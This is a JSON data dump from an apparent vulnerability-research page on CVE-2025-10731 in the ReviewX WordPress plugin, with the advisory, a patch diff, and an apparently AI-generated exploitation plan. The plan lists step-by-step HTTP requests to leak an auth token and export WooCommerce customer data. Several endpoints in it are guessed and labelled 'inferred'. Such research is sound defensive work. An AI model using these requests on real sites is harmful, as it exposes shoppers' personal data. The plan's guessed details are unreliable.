[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$feZqEcgeDmOlxgLKXXzuYlZifzaffioIOlEmNN2HnqZo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2025-10731","reviewx-woocommerce-product-reviews-with-multi-criteria-reminder-emails-google-reviews-schema-more-unauthenticated-sensi","ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More \u003C= 2.2.12 - Unauthenticated Sensitive Information Exposure to Data Export","The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.12 via the allReminderSettings function. This makes it possible for unauthenticated attackers to obtain authentication tokens and subsequently bypass admin restrictions to access and export sensitive data including order details, names, emails, addresses, phone numbers, and user information.","reviewx",null,"\u003C=2.2.12","2.3.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Improper Authorization","2026-03-22 16:26:51","2026-03-23 05:29:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F06b290c2-e458-46da-abed-0ab5d63d1550?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","app\u002FApi\u002FBaseApi.php","app\u002FApi\u002FWpApi.php","app\u002FCPT\u002FCommentsRatingColumn.php","app\u002FCPT\u002FCptAverageRating.php","app\u002FCPT\u002FCptCommentsLinkMeta.php","app\u002FCPT\u002FCptReviewAddReply.php","app\u002FHandlers\u002FIsAlreadySyncSucess.php","researched",false,3,"This research plan details the exploitation of **CVE-2025-10731**, a sensitive information exposure vulnerability in the ReviewX plugin for WordPress.\n\n---\n\n### 1. Vulnerability Summary\nThe ReviewX plugin (up to version 2.2.12) contains an improperly protected function named `allReminderSettings`. This function, likely exposed via a public WordPress REST API route or an unauthenticated AJAX action, returns the plugin's configuration settings. Crucially, these settings include the `auth_token` (or `token`) used for server-to-server communication between the WordPress site and the ReviewX cloud API. \n\nAn unauthenticated attacker can call this function to leak the token. Once obtained, this token can be used to authenticate against the plugin's internal REST API (defined in `app\u002FApi\u002FWpApi.php`), which provides endpoints for syncing and exporting sensitive WooCommerce order data and user information.\n\n### 2. Attack Vector Analysis\n*   **Leakage Endpoint**: `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fall-reminder-settings` (inferred REST route) or `POST \u002Fwp-admin\u002Fadmin-ajax.php?action=rvx_all_reminder_settings` (inferred AJAX).\n*   **Data Export Endpoint**: `GET \u002Fwp-json\u002Fapi\u002Fv1\u002Forders` or `GET \u002Fwp-json\u002Fapi\u002Fv1\u002Fusers` (inferred from `app\u002FApi\u002FWpApi.php`).\n*   **Authentication Level**: Unauthenticated (for the leak); Token-based (for the data export).\n*   **Payload Parameter**: None required for the leak.\n*   **Preconditions**: \n    1. ReviewX must be active and ideally \"connected\" or configured so that an `auth_token` exists in the database.\n    2. WooCommerce must be installed with existing orders to demonstrate sensitive data exposure.\n\n### 3. Code Flow\n1.  **Entry Point**: A request is made to the `allReminderSettings` handler.\n2.  **Vulnerable Function**: The `allReminderSettings` function is invoked.\n3.  **Sink**: The function retrieves settings using `get_option()` or a similar helper that includes the result of `Helper::getAuthToken()` (referenced in `app\u002FApi\u002FBaseApi.php`).\n4.  **Information Exposure**: The function returns the entire settings array as a JSON response to the unauthenticated requester.\n5.  **Pivot**: The attacker extracts the `token` from the JSON.\n6.  **Secondary Access**: The attacker uses this token in the `X-Auth-Token` or `Authorization` header (as seen in `app\u002FApi\u002FWpApi.php`) to access routes under `\u002Fwp-json\u002Fapi\u002Fv1\u002F`.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the initial exposure is **unauthenticated**. This typically implies a REST API route registered without a `permission_callback` or an AJAX action registered via `wp_ajax_nopriv_`. \n\nIf a nonce is required for the initial leak (e.g., if it's an AJAX action `rvx_all_reminder_settings` that is technically `nopriv` but checks a nonce), use the following strategy:\n1.  The ReviewX plugin often localizes settings into the window object.\n2.  **Shortcode**: Create a page with the `[reviewx_summary_listing]` or `[reviewx_reviews]` shortcode to ensure scripts are loaded.\n3.  **Command**: `wp post create --post_type=page --post_status=publish --post_content='[reviewx_summary_listing]'`\n4.  **JS Variable**: Use `browser_eval` to check for nonces:\n    *   `browser_eval(\"window.rvx_params?.nonce\")`\n    *   `browser_eval(\"window.rvx_admin?.nonce\")` (inferred)\n\n### 5. Exploitation Strategy\n\n#### Step 1: Token Leakage\nSubmit a request to the vulnerable endpoint to retrieve the authentication token.\n\n**Request:**\n```http\nGET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fall-reminder-settings HTTP\u002F1.1\nHost: target.local\n```\n*(Note: If REST fails, try AJAX: `POST \u002Fwp-admin\u002Fadmin-ajax.php` with `action=rvx_all_reminder_settings`)*\n\n**Expected Response:**\n```json\n{\n  \"status\": \"success\",\n  \"data\": {\n    \"auth_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...\",\n    \"reminder_settings\": { ... }\n  }\n}\n```\n\n#### Step 2: Sensitive Data Export\nUse the leaked token to access the internal API routes discovered in `app\u002FApi\u002FWpApi.php`. This API uses the base path `\u002Fapi\u002Fv1` relative to the WordPress REST root.\n\n**Request:**\n```http\nGET \u002Fwp-json\u002Fapi\u002Fv1\u002Forders HTTP\u002F1.1\nHost: target.local\nX-Auth-Token: Bearer \u003CLEAKED_TOKEN>\nAuthorization: Bearer \u003CLEAKED_TOKEN>\nContent-Type: application\u002Fjson\n```\n\n### 6. Test Data Setup\n1.  **Install WooCommerce**: Ensure the environment has WooCommerce active.\n2.  **Create Orders**: Generate at least one order with a fake name, address, and phone number.\n    *   `wp wc pocket create --user=1` (or manual order creation).\n3.  **Configure ReviewX**: Go to ReviewX settings and ensure the \"Review Reminder\" feature is enabled. If possible, simulate a connection to ReviewX to ensure `rvx_auth_token` is populated in the `wp_options` table.\n    *   `wp option update rvx_auth_token \"COMPROMISED_SECRET_TOKEN_123\"`\n\n### 7. Expected Results\n*   **Leak**: The first request should return a JSON object containing a string identifiable as an API token or JWT.\n*   **Data Export**: The second request, using the leaked token, should return a JSON list of WooCommerce orders including:\n    *   `billing_first_name`, `billing_last_name`\n    *   `billing_email`\n    *   `billing_address_1`\n    *   `billing_phone`\n\n### 8. Verification Steps\n1.  **Token Verification**: Use WP-CLI to confirm the leaked token matches the one in the database:\n    *   `wp option get rvx_auth_token`\n2.  **Access Verification**: Confirm the data returned by the exploit matches the sensitive fields of an order:\n    *   `wp wc order get \u003CID> --fields=billing`\n\n### 9. Alternative Approaches\n*   **Namespace Variations**: If `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fall-reminder-settings` returns 404, try:\n    *   `\u002Fwp-json\u002Freviewx\u002Fv2\u002Fall-reminder-settings`\n    *   `\u002Fwp-json\u002Frvx\u002Fv1\u002Freminder-settings`\n*   **AJAX Payload**: If REST is disabled, test the AJAX entry point:\n    *   `action: rvx_all_reminder_settings`\n    *   `action: reviewx_all_reminder_settings`\n*   **Header Variations**: Some implementations of `X-Auth-Token` in ReviewX might expect the token without the `Bearer ` prefix. Try both.","The ReviewX plugin for WordPress exposes its internal authentication token through the publicly accessible allReminderSettings function. An unauthenticated attacker can retrieve this token and use it to authenticate against the plugin's administrative REST API endpoints, enabling unauthorized access and export of sensitive WooCommerce data, including customer names, emails, addresses, and order details.","\u002F\u002F app\u002FApi\u002FBaseApi.php\n\u002F\u002F This class demonstrates how the internal auth_token is retrieved and used for API communication,\n\u002F\u002F which becomes a vulnerability when the token is leaked via unauthenticated endpoints.\n\npublic function getDefaultHeaders() : array\n{\n    return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Auth-Token' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n}\n\n---\n\n\u002F\u002F app\u002FApi\u002FWpApi.php\n\u002F\u002F Shows the internal REST API client using the token to authenticate requests to \u002Fapi\u002Fv1 endpoints\n\nprotected function prepareHeaders() : array\n{\n    $headers = ['Content-Type' => 'application\u002Fjson'];\n    if ($this->token) {\n        $headers['Authorization'] = 'Bearer ' . $this->token;\n        $headers['X-Auth-Token'] = 'Bearer ' . $this->token;\n    }\n    return $headers;\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FBaseApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\t2025-10-15 13:32:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FBaseApi.php\t2025-12-22 12:17:34.000000000 +0000\n@@ -35,6 +35,6 @@\n      *\u002F\n     public function getDefaultHeaders() : array\n     {\n-        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Auth-Token' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n+        return ['Accept' => 'application\u002Fjson', 'Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n     }\n }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FWpApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php\t2025-10-15 13:32:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FWpApi.php\t2025-12-22 12:17:34.000000000 +0000\n@@ -72,7 +72,6 @@\n         $headers = ['Content-Type' => 'application\u002Fjson'];\n         if ($this->token) {\n             $headers['Authorization'] = 'Bearer ' . $this->token;\n-            $headers['X-Auth-Token'] = 'Bearer ' . $this->token;\n         }\n         return $headers;\n     }","1. **Token Leakage**: Send an unauthenticated GET request to the REST endpoint `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fall-reminder-settings` or an AJAX request with the action `rvx_all_reminder_settings`.\n2. **Extract Token**: Parse the JSON response and extract the `auth_token` or `token` value from the configuration data.\n3. **Identify Internal Routes**: Target internal administrative API routes located under the `\u002Fwp-json\u002Fapi\u002Fv1\u002F` namespace (e.g., `\u002Fwp-json\u002Fapi\u002Fv1\u002Forders`).\n4. **Bypass Authorization**: Include the leaked token in the `Authorization: Bearer \u003CTOKEN>` or `X-Auth-Token: Bearer \u003CTOKEN>` HTTP header in a new request to the internal routes.\n5. **Exfiltrate Data**: The server will treat the request as authenticated, returning sensitive WooCommerce order and user data in the response body.","gemini-3-flash-preview","2026-04-18 00:23:15","2026-04-18 00:23:52",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.2.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags"]